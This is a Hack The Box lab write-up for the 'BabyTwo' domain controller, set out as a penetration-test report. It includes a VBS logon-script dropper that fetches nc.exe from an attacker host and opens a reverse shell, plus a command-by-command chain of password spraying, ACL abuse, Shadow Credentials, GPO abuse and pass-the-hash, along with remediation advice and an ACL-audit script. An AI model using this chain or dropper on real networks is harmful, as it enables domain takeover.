
HTB - BabyTwo

Anonymous SMB access exposes a homes share that leaks the full domain user list and an apps/NETLOGON logon script. A lazy account-provisioning pattern (username == password) yields valid credentials for Carl.Moore. Although SYSVOL is read-only at the share level, a misconfigured DACL on login.vbs grants Everyone FULL control, allowing the logon script to be overwritten with a reverse shell that fires as Amelia.Griffiths (user flag). BloodHound shows Amelia, via the legacy group, holds WriteDacl/WriteOwner over the gpoadm account. PowerView grants full control, a Shadow Credentials attack with Whisker and Rubeus recovers gpoadm's NT hash, and because gpoadm controls domain GPOs, pygpoabuse schedules a task adding gpoadm to Domain Admins — completing full domain compromise.


Hack The Box — BabyTwo

Medium | Windows | Hack The Box


Field       | Value
Report Date | 26 June 2026
Assessed By | RobInTheHood
Target IP   | 10.129.234.72
Hostname    | DC
Domain      | baby2.vl

Table of Contents

  1. Executive Summary
  2. Scope
  3. Methodology
  4. Attack Chain Summary
  5. Findings
  6. Proof of Access
  7. Credentials Discovered
  8. Impact Assessment
  9. Remediation Summary
  10. Key Takeaways
  11. Tools Used
  12. Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine BabyTwo. The objective was to obtain domain-administrator-level access in an authorised lab environment and document the attack path with reproducible evidence.

No credentials are supplied. Anonymous (guest) SMB access exposes a homes share that discloses the full domain user list and an apps/NETLOGON share containing a logon script (login.vbs). A lazy account-provisioning pattern — where the password equals the username — yields valid credentials for Carl.Moore.

Although SYSVOL is read-only at the share level, the DACL on login.vbs grants Everyone FULL control. The logon script is overwritten with a reverse-shell dropper that executes the next time a user authenticates, landing a shell as Amelia.Griffiths and the user flag.

BloodHound reveals that Amelia, through the legacy group, holds WriteDacl / WriteOwner over the gpoadm account. PowerView is used to grant full control, after which a Shadow Credentials attack with Whisker and Rubeus recovers gpoadm’s NT hash. Because gpoadm administers domain-linked Group Policy Objects, pygpoabuse is used to schedule a task that adds gpoadm to Domain Admins, completing full domain compromise.


2. Scope

Field            | Value
Target IP        | 10.129.234.72
Hostname         | DC
Domain           | baby2.vl
Operating System | Windows Server 2022 Build 20348
Machine Rating   | Medium
Environment      | Hack The Box — Authorised Training Lab
Assessment Date  | 26 June 2026
Assessor         | RobInTheHood

3. Methodology

  • Reconnaissance — service discovery and external attack-surface mapping
  • Enumeration — anonymous share, user, and logon-script analysis
  • Exploitation — initial access through validated misconfiguration paths
  • Lateral Movement — privilege pivoting via logon-script hijack and ACL abuse
  • Privilege Escalation — full compromise to domain-administrator context
  • Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

Phase                | Technique                                                                                    | MITRE ATT&CK
Recon                | Nmap — DC port profile (53/88/389/445/636/3268/9389)                                         | T1046
Enumeration          | Anonymous SMB share listing → homes user list, apps/NETLOGON logon script                    | T1135
Credential Access    | Password spraying — username == password (Carl.Moore)                                        | T1110.001
Initial Access       | Weak SYSVOL file DACL → logon-script (login.vbs) hijack → reverse shell as Amelia.Griffiths  | T1037.001
Discovery            | BloodHound ACL analysis — legacy group → WriteDacl/WriteOwner over gpoadm                    | T1087.002
Privilege Escalation | PowerView Add-DomainObjectAcl → GenericAll → Shadow Credentials → NT hash                    | T1222.001 · T1649
Privilege Escalation | GPO abuse — scheduled task adds gpoadm to Domain Admins                                      | T1484.001
Post-Exploitation    | Pass-the-hash over WinRM as gpoadm (Domain Admin)                                            | T1550.002

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

A full TCP port scan returns the classic Windows domain controller profile:

nmap -p- -Pn --min-rate 1000 "$TARGET"
Port      | Service
53/tcp    | DNS
88/tcp    | Kerberos
135/tcp   | RPC
139/tcp   | NetBIOS
389/tcp   | LDAP
445/tcp   | SMB
464/tcp   | kpasswd
636/tcp   | LDAPS
3268/3269 | Global Catalog
3389/tcp  | RDP
9389/tcp  | ADWS

The combination of Kerberos, LDAP, SMB, and ADWS confirms a domain controller for baby2.vl. With no supplied credentials, enumeration begins against SMB using the guest / anonymous account.


Enumeration — Anonymous SMB Shares

nxc smb "$TARGET" -u 'guest' -p '' --shares
Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl) (signing:True) (Null Auth:True)
[+] baby2.vl\guest:
Share      Permissions   Remark
-----      -----------   ------
ADMIN$                   Remote Admin
apps       READ
C$                       Default share
docs
homes      READ,WRITE
IPC$       READ          Remote IPC
NETLOGON   READ          Logon server share
SYSVOL                   Logon server share

Two non-default shares stand out: apps and homes.


Enumeration — Building the User List from homes

Spidering the homes share reveals one folder per domain user:

nxc smb "$TARGET" -u 'guest' -p '' --spider homes --pattern .
Amelia.Griffiths   Carl.Moore       Harry.Shaw       Joan.Jennings
Joel.Hurst         Kieran.Mitchell  Lynda.Bailey     Mohammed.Harris
Nicola.Lamb        Ryan.Jenkins     library

This produces a clean username list to attack.


Enumeration — Logon Script in apps / NETLOGON

nxc smb "$TARGET" -u 'guest' -p '' --spider apps --regex . --only-files
//.../apps/dev/CHANGELOG          (size 108)
//.../apps/dev/login.vbs.lnk      (size 1800)

The .lnk shortcut points at login.vbs stored in NETLOGON (\\dc.baby2.vl\NETLOGON, i.e. SYSVOL\baby2.vl\scripts). The script is a standard domain logon script that maps network drives and runs automatically whenever a user logs on:

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

As guest we cannot write to it yet — but its automatic execution makes it a high-value target for later.


Credential Access — Password == Username

Brute-forcing the discovered users against rockyou produced nothing. The next hypothesis: an administrator who provisions accounts with username == password. Testing the user list against itself:

nxc smb "$TARGET" -u users.txt -p users.txt --ignore-pw-decoding
[+] baby2.vl\Carl.Moore:Carl.Moore

Valid credentials: Carl.Moore : Carl.Moore. Re-enumerating shares as Carl shows a much larger write surface:

apps    READ,WRITE
docs    READ,WRITE
homes   READ,WRITE

Initial Access — Logon Script Hijack

The decisive detail is not the share permission but the file-level DACL on the logon script. Even though SYSVOL is read-only at the share level, the ACL on login.vbs grants Everyone and Authenticated Users FULL control:

smbcacls "//$TARGET/SYSVOL" "baby2.vl/scripts/login.vbs" -U 'baby2.vl\Carl.Moore%Carl.Moore'
OWNER:BUILTIN\Administrators
ACL:Everyone:ALLOWED/0x0/FULL
ACL:NT AUTHORITY\Authenticated Users:ALLOWED/0x0/FULL
ACL:NT AUTHORITY\SYSTEM:ALLOWED/0x0/FULL
ACL:BUILTIN\Administrators:ALLOWED/0x0/FULL
ACL:BUILTIN\Server Operators:ALLOWED/0x0/READ

The logon script can therefore be overwritten. It is replaced with a VBS dropper / reverse shell, with two guard rails so it does not spawn endless shells while other users log in:

Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")

' Guard 1: download nc.exe only if not already present
If Not fso.FileExists("C:\Windows\Temp\nc.exe") Then
    shell.Run "cmd /c certutil -urlcache -split -f http://10.10.14.X:8000/nc.exe C:\Windows\Temp\nc.exe", 0, True
End If

' Guard 2: relaunch the shell ONLY if no nc.exe is already running
shell.Run "cmd /c tasklist /FI ""IMAGENAME eq nc.exe"" | find /I ""nc.exe"" || C:\Windows\Temp\nc.exe 10.10.14.X 4444 -e cmd.exe", 0, False

When a user next authenticates, the script fires and a shell is received:

C:\Windows\system32> whoami
baby2\amelia.griffiths

User Flag

C:\> type user.txt
42783b2c1483aeb70eca6810f0645c38

Discovery — BloodHound ACL Analysis

Amelia’s group memberships include BABY2\office and BABY2\legacy. BloodHound shows that the legacy group holds powerful outbound rights:

Figure: Amelia.Griffiths outbound rights in BloodHound

AMELIA.GRIFFITHS --MemberOf--> LEGACY
        LEGACY --WriteOwner / WriteDacl--> GPOADM
        LEGACY --WriteOwner / WriteDacl--> GPO-MANAGEMENT (OU)

So, via the legacy group, Amelia effectively has WriteOwner + WriteDacl over the gpoadm user.


Privilege Escalation — Self-Granting ACLs → Shadow Credentials

A direct password reset is denied — WriteDacl/WriteOwner is not the same as Reset Password:

Set-ADAccountPassword -Identity gpoadm -Reset -NewPassword $p
# Set-ADAccountPassword : Access is denied

A Shadow Credentials attempt with Whisker also fails initially, because we do not yet hold rights over msDS-KeyCredentialLink:

./Whisker.exe add /target:gpoadm
# [X] Could not update attribute: Access is denied.

Because we have WriteDacl over gpoadm, PowerView is used to add an ACE granting Amelia full control over the target, then the attack is repeated:

. .\PowerView.ps1   # dot-source to load functions silently
Add-DomainObjectAcl -TargetIdentity gpoadm -PrincipalIdentity Amelia.Griffiths -Rights All

Whisker can now write the key credential. A PFX is saved to disk (/path + /password), since the inline Base64 certificate exceeds the limited cmd/PowerShell line length:

./Whisker.exe add /target:gpoadm /path:C:\Users\Amelia.Griffiths\Desktop\cert.pfx /password:Password123!
# [+] Updated the msDS-KeyCredentialLink attribute of the target object

Rubeus requests a TGT and recovers credentials via U2U:

./Rubeus.exe asktgt /user:gpoadm /certificate:C:\Users\Amelia.Griffiths\Desktop\cert.pfx \
    /password:"Password123!" /domain:baby2.vl /dc:dc.baby2.vl /getcredentials /show
[+] TGT request successful!
  UserName : gpoadm
  NTLM     : 51B4E7AEE2FBDD4E36F2381115C8FE7A

Privilege Escalation — GPO Abuse → Domain Admin

The gpoadm account (member of GPO-Management) can edit domain-linked GPOs. The Default Domain Policy (6AC1786C-016F-11D2-945F-00C04FB984F9) is abused with pygpoabuse to schedule a task that adds gpoadm to Domain Admins:

pygpoabuse.py baby2.vl/gpoadm -hashes :51B4E7AEE2FBDD4E36F2381115C8FE7A \
    -gpo-id 6AC1786C-016F-11D2-945F-00C04FB984F9 \
    -command 'net group "Domain Admins" gpoadm /add /domain' -dc-ip $TARGET -f
# [+] ScheduledTask TASK_9cd980c5 created!

After the GPO refreshes, authenticate with the hash and confirm Domain Admin membership:

evil-winrm -u 'gpoadm' -H 51B4E7AEE2FBDD4E36F2381115C8FE7A -i $TARGET
*Evil-WinRM* PS> whoami /groups
BABY2\Domain Admins                 Group   S-1-5-21-...-512
BUILTIN\Administrators              Alias   S-1-5-32-544
Mandatory Label\High Mandatory Level

Root Flag

*Evil-WinRM* PS C:\Users\Administrator> type "C:\Users\Administrator\Desktop\root.txt"
293500962edc31fa154951eeeb5740f9

6. Proof of Access

Level                                         | Evidence
User (Amelia.Griffiths)                       | 42783b2c1483aeb70eca6810f0645c38
Root / Administrator (gpoadm → Domain Admins) | 293500962edc31fa154951eeeb5740f9

7. Credentials Discovered

Account          | Secret                           | Type              | Source
guest            | (blank)                          | Anonymous SMB     | Null authentication
Carl.Moore       | Carl.Moore                       | Domain password   | Password == username spray
Amelia.Griffiths | (logon-script RCE)               | Interactive shell | Logon-script hijack
gpoadm           | 51B4E7AEE2FBDD4E36F2381115C8FE7A | NT hash           | Shadow Credentials (Whisker + Rubeus)

8. Impact Assessment

Successful exploitation resulted in complete domain compromise through a chain of misconfigurations rather than software vulnerabilities. Anonymous SMB access leaked the entire user roster, and a weak provisioning convention gave an authenticated foothold. The single most damaging finding is the over-permissive DACL on the SYSVOL logon script: any authenticated user could weaponise a script that executes in the security context of every user who logs on, providing reliable lateral movement. From there, a delegated ACL path (legacy group → gpoadm) combined with Shadow Credentials and GPO abuse delivered Domain Admin without ever cracking a password or launching a network exploit.


9. Remediation Summary

Priority | Action
Critical | Tighten the DACL on login.vbs and all SYSVOL/NETLOGON scripts — domain users must have read/execute only, never Write/Full Control. Audit Everyone and Authenticated Users ACEs across SYSVOL.
Critical | Never provision accounts with username == password; enforce a strong, unique password policy and reset all affected accounts (Carl.Moore).
High     | Disable anonymous/guest SMB access and remove unnecessary read permissions on the homes, apps, and docs shares.
High     | Review and remove dangerous delegated ACLs (WriteDacl/WriteOwner) held by the legacy group over gpoadm and the GPO-Management OU.
High     | Restrict who can edit domain-linked GPOs; monitor for unexpected scheduled-task modifications introduced through GPO.
Medium   | Monitor and alert on msDS-KeyCredentialLink changes to detect Shadow Credentials attacks.
Medium   | Enable LDAP signing and channel binding to impede BloodHound-style ACL enumeration.
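The first remediation row calls for auditing Everyone and Authenticated Users ACEs across SYSVOL. The following Python script is an added example, not part of the original report, that parses smbcacls output in the format shown in F-01 and flags every ALLOWED ACE that gives a broad principal the ability to modify the file; the embedded sample is the login.vbs DACL listed above, and the set of "broad" principals and the access-mask bits treated as write access are my own assumptions.

```python
"""Flag over-permissive ACEs in smbcacls output for SYSVOL/NETLOGON logon scripts."""
import re

# One ACE per line, as smbcacls prints it:  ACL:<principal>:<ALLOWED|DENIED>/<flags>/<rights>
ACE_RE = re.compile(r"^ACL:(?P<principal>.+?):(?P<type>ALLOWED|DENIED)/(?P<flags>0x[0-9A-Fa-f]+)/(?P<rights>\S+)$")

# Assumed broad principals; any "<DOMAIN>\Domain Users" is matched separately in is_broad().
BROAD_PRINCIPALS = {"everyone", r"nt authority\authenticated users", r"builtin\users"}

# Access-mask bits that let a principal change the file, its DACL or its owner.
WRITE_MASK = (0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000   # FILE_WRITE_DATA, FILE_APPEND_DATA, DELETE, WRITE_DAC, WRITE_OWNER
              | 0x40000000 | 0x10000000)                 # GENERIC_WRITE, GENERIC_ALL

def is_broad(principal: str) -> bool:
    p = principal.strip().lower()
    return p in BROAD_PRINCIPALS or p.endswith("\\domain users")

def grants_write(rights: str) -> bool:
    """True if a symbolic (FULL/CHANGE/RWXDPO) or hex rights field allows modification."""
    r = rights.upper()
    if r.startswith("0X"):
        return bool(int(r, 16) & WRITE_MASK)
    if r in ("FULL", "CHANGE"):
        return True
    if r == "READ":
        return False
    return any(flag in r for flag in "WDPO")  # W=write D=delete P=change perms O=take ownership

def audit(smbcacls_output: str) -> list[tuple[str, str]]:
    """Return (principal, rights) for every ALLOWED ACE giving a broad principal write access."""
    findings = []
    for line in smbcacls_output.splitlines():
        m = ACE_RE.match(line.strip())
        if m and m["type"] == "ALLOWED" and is_broad(m["principal"]) and grants_write(m["rights"]):
            findings.append((m["principal"], m["rights"]))
    return findings

# Constructed sample input: the login.vbs DACL reported in F-01 of this walkthrough.
SAMPLE = """OWNER:BUILTIN\\Administrators
ACL:Everyone:ALLOWED/0x0/FULL
ACL:NT AUTHORITY\\Authenticated Users:ALLOWED/0x0/FULL
ACL:NT AUTHORITY\\SYSTEM:ALLOWED/0x0/FULL
ACL:BUILTIN\\Administrators:ALLOWED/0x0/FULL
ACL:BUILTIN\\Server Operators:ALLOWED/0x0/READ
"""

if __name__ == "__main__":
    for principal, rights in audit(SAMPLE):
        print(f"FINDING: {principal} has {rights} on login.vbs")
```

Run it against `smbcacls` output captured for each file under SYSVOL\<domain>\scripts; an empty result for a logon script is the expected state after the Critical remediation is applied.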

10. Key Takeaways

  • Share-level permissions and file-level ACLs are independent — a read-only share can still expose a fully writable, auto-executing file. Always inspect object DACLs with smbcacls, not just share permissions.
  • Logon scripts in SYSVOL execute for every user who authenticates; a writable logon script is effectively domain-wide code execution against any account that logs on.
  • Lazy provisioning patterns (username == password) remain a high-yield, low-effort initial-access vector — spray the user list against itself before reaching for rockyou.
  • WriteDacl/WriteOwner is not Reset Password. The correct play is to self-grant the rights you need (Add-DomainObjectAcl … -Rights All) and then perform Shadow Credentials — a deterministic, low-noise path to an NT hash.
  • Control over domain-linked GPOs is equivalent to control over every object the GPO applies to; pygpoabuse turns GPO write access into immediate Domain Admin via a scheduled task.

11. Tools Used

Tool         | Purpose
nmap         | Port and service discovery
nxc (NetExec) | Anonymous SMB enumeration, share spidering, password spraying
smbcacls     | SYSVOL file DACL inspection
smbclient    | SMB share browsing and file download
BloodHound   | ACL and attack-path analysis in Active Directory
PowerView    | Self-granting ACLs (Add-DomainObjectAcl)
Whisker      | Shadow Credentials (msDS-KeyCredentialLink)
Rubeus       | TGT request and credential recovery via U2U
pygpoabuse   | GPO abuse — scheduled-task injection
evil-winrm   | WinRM shell and pass-the-hash authentication

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.


End of Report — BabyTwo | RobInTheHood | 26 June 2026